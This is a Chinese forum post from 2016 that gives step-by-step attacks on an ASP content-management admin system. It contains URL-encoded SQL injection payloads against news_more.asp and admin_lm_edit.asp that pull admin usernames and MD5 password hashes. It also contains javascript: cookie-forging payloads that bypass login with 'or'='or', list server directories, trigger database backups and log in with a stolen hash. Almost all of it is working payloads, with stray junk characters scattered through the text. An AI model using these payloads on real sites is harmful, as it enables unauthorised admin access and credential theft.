一、注入8 }2 @2 J/ k; C8 M/ S
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2% D. x( a# `/ R+ R* R9 |9 C
7 O* K9 \2 }9 e& N2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
! u G* |) s- h* N0 a. I6 ]第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin$ R* ~$ I; M& U" W
可得到用户名和MD5加密码的密码。
0 ]3 p- B' Q9 ~1 a9 f4 p
9 m5 r0 y1 G9 G; n8 }二、cookies欺骗! k! j: a/ I6 ^# K0 E* Q8 K
. h- E8 p5 p9 ` y$ Q1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
7 V! C, x3 b5 X2 Z9 Rjavascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
$ t: i i1 H7 V% P$ v) V: [" e, h7 w# F2 q) B7 N5 ~- ~, U& T
2、列目录.
2 T' M M" r% l$ |1 {javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
+ L6 R; a0 C) j. C- |8 D% h
4 I- X: c ~2 u3 F- A7 V8 u( e3、数据库备份(适用性好像比较低.)
: @" z% `, y xjavascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
8 U8 H- |9 o' L0 g2 r. V4 H: L a' L1 Y; d" m& a- W1 X E
4、得到MD5密码解不了密进后台方法4 ^0 ~ {3 D4 |
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
5 ]" N2 z1 b3 j. [/ d! ~ |
发表于 2016-5-11 14:55:08
收藏
支持
反对